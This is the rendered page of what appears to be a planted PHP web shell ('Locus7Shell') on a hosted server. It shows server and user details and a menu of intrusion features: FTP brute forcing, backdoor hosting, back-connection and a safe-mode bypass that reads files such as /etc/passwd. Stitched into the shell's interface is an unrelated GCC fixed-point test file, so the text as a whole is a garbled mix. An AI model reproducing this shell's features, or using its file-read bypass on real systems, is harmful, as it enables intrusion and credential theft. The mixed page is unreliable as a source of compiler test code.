Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/fixed-point/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     struct-union.c (1.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do compile } */
/* { dg-options "-O -Wall" } */

/* C99 6.5.2.3 Structure and union members.
   If the first expression has qualified type, the result has the so-qualified
   version of the type of the designated member.
   Based on the test from ../dfp/.  */

struct s {_Fract f; const long _Fract lf;};
struct sv { volatile _Fract f; volatile long _Fract lf; };
union u
{
  const long _Fract lf;
  _Fract f;
  const struct s cs;
};

struct s s;
struct sv sv;
const struct s cs;

union u u;
const union u cu;

struct s g (struct s s)
{
  return s;
}

union u h (union u u)
{
  return u;
}

void f()
{
  cs.f = 0.1r; /* { dg-error "assignment of member 'f' in read-only object" } */
  cs.lf = 0.2lr; /* { dg-error "assignment of member 'lf' in read-only object" } */
  s.lf = 0.3lr;  /* { dg-error "assignment of read-only member" } */

  s.f = 0.4r;
  u.f = 0.5r;

  u.lf = 0.6lr;    /* { dg-error "assignment of read-only member" } */
  u.cs.f = 0.7r;   /* { dg-error "assignment of member 'f' in read-only object" } */
  u.cs.lf = 0.8lr; /* { dg-error "assignment of member 'lf' in read-only object" } */

  cu.f = 0.9r;   /* { dg-error "assignment of member 'f' in read-only object" } */

  cu.lf = 0.01lr;    /* { dg-error "assignment of member 'lf' in read-only object" } */
  cu.cs.f = 0.02r;   /* { dg-error "assignment of member 'f' in read-only object" } */
  cu.cs.lf = 0.03lr; /* { dg-error "assignment of member 'lf' in read-only object" } */

  /* f().x is a valid postfix expression but is not an lvalue if
     function f() returning a structure or union.  */
  g(s).f = 0.04r;  /* { dg-error "lvalue required" } */
  h(u).lf = 0.05lr;  /* { dg-error "lvalue required" } */

  /* Test assignment to volatile structure members.  */
  sv.f = 0.06r;
  sv.lf = 0.07lr;
}


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--